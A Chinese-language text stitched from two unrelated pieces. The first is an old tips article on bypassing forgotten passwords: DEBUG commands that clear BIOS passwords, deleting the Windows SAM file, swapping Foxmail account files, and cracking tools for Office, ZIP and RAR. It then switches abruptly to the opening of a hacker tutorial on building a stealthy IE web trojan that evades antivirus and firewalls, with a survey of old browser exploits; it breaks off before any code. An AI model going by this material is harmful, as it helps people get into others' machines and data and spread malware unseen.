注意：有些主板设置了CMOS密码清除跳线，请参照主板说明书将该跳线短接，这样也可以清除CMOS密码。

二、遗忘了SETUP密码

遗忘了该密码，就不能进行CMOS设置了。如果你能使用计算机，但不能进入CMOS设置，可以这样解决：在DOS状态下启动DEBUG，然后输入如下命令手工清除SETUP密码：


_ o 70 16

_ o 71 16

_ q

你也可以用CMOS密码破解软件来显示CMOS密码。这样的软件有很多，例如Cmospwd，它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS。在DOS下启动该程序，CMOS密码就会显示出来。

三、遗忘了Windows登录密码

WinMe/98下对策：开机后按F8键选择DOS启动，然后删除Windows安装目录下的*.PWL密码文件，以及Profiles子目录下的所有个人信息文件。重新启动Windows后，系统会弹出一个不包含任何用户名的密码设置框，此时无需输入任何内容，直接单击“确定”，登录密码即被删除。

另外，将注册表数据库HKEY_LOCAL_MACHINE\Network\Logon 分支下的UserProfiles修改为“0”，然后重新启动Windows也可达到同样目的。

WinXP/2000下对策：删除系统安装目录\system32\config下的SAM文件，重新启动，此时管理员Administrator账号已经没有密码了，用Administrator帐户登陆系统，不用输入任何密码，进入系统后再重新设置登陆帐户密码即可。

四、遗忘了Windows屏保密码

解决方法：在开机后按F8键，选择安全模式启动，进入Windows 后，右击桌面空白处，从弹出的快捷菜单中选择“属性”/屏幕 保护，取消“密码保护”即可。

五、遗忘了Windows电源管理密码

Windows的电源管理功能也可以设置密码，启用此功能后，当系统从节能状态返回时就会要求输入密码。

如果你遗忘了该密码，可以使用前面破解Windows登录密码的那种方法去破解。

六、遗忘了微软Office密码

解决方法：使用破解Office系列文档密码的软件，这样的软件有很多，例如AOPR，该软件可以同时对微软Office系列Word、Excel及Access等软件所生成的密码进行破解，还可以对Word的*.DOT模板文件的密码进行搜索。

七、遗忘了WinZip压缩包密码

解决方法：用软件UZPC（Ultra Zip Password Cracker），找回丢失的密码。使用该软件时要先设置适当的解密方式，例如“后门方式”、“穷举方式”、“字典方式”和“ 模式匹配方式”等，一般采用“Brute Force穷举方式”，然后软件就会对所有可能的密码进行测试，直至找出最后的结果。

八、遗忘了RAR压缩包密码

遗忘了RAR压缩包密码后，你可下载一个CRARK软件来对其进行破解，它主要通过命令行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使用“CRARK RAR压缩包文件名”命令，利用缺省参数即可进行破解。

九、遗忘了QQ/ICQ密码

为保护QQ密码，你应该赶快到这里申请密码保护。假如你忘记了QQ密码、或者密码被盗时，只需填写正确的信息即可取回。

如果你要找回ICQ密码，可以使用软件ICQ Password Revealer，这是一个DOS下的命令行实用软件，你只需在ICQ安装文件夹的NEWDB子文件夹下执行该文件，然后按照屏幕提示输入自己的UIN，系统即会找回“久违”的ICQ密码。



十、遗忘了OE密码

如果你忘了密码，无法进入OutLook Express阅读收到的邮件、使用通讯簿等，可以这样破解:重启计算机并按F8，选择“安全模式”，再启动OE就不需要密码了，然后你可以重建一个用户(不能修改密码)，把信息导入新用户信箱即可。

十一、遗忘了Foxmail帐户密码

解决方法：消除忘记的Foxmail帐户密码。首先打开Foxmail，新建一个帐户(帐户名任意，例如lacl1)，然后退出Foxmail，运行Windows资源管理器，找到Foxmail\MAIL\lacl1文件夹，里边有个“account.stg”，把它复制到忘记密码的帐户(例如“lacl”)目录中，直接覆盖原来的“account.stg”文件。再重新运行Foxmail，打开忘记密码的帐户，呵呵，怎么连“口令提示框”也没有？现在你就可以直接打开忘记密码的帐户，而且帐户中原来的邮件一封都不会少！

十二、查看“*”密码

许多密码在屏幕上都是以“*”显示的，因此我们无法直接看到密码的原始字符，如果你使用专门破解“*”密码的软件，即可查出这些密码的原始字符。

这样的软件有很多，例如Win2000/Win98下你可用iOpus Password Recovery，WinXP下可用Password Spectator Pro 。使用时，只需先打开显示“*”的窗口，启动这类软件，然后按住Ctrl键，在密码栏中按下鼠标左键，这些“*”密码的原始字符就会显示出来了。

既然要打造完美的IE网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：  

一：可以躲过杀毒软件的追杀；  

二：可以避开网络防火墙的报警；  

三：能够适用于多数的Windows操作系统（主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003）中的多数IE版本（主要包括IE5.0、IE5.5、IE6.0），最好能打倒SP补丁；  

四：让浏览者不容易发觉IE变化，即可以悄无声息，从而可以长久不被发现。  

（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）  

满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……  

看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！  

第一种：利用古老的MIME漏洞的ＩＥ网页木马  

这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。  

第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马  

虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。  

第三种：利用OBJECT对象类型确认漏洞（ＯｂｊｅｃｔＤａｔａＲｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）  

此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：  

１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；  

２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？  

３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式来利用，但经测试发现对ＩＥ６．０不起作用。  

看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。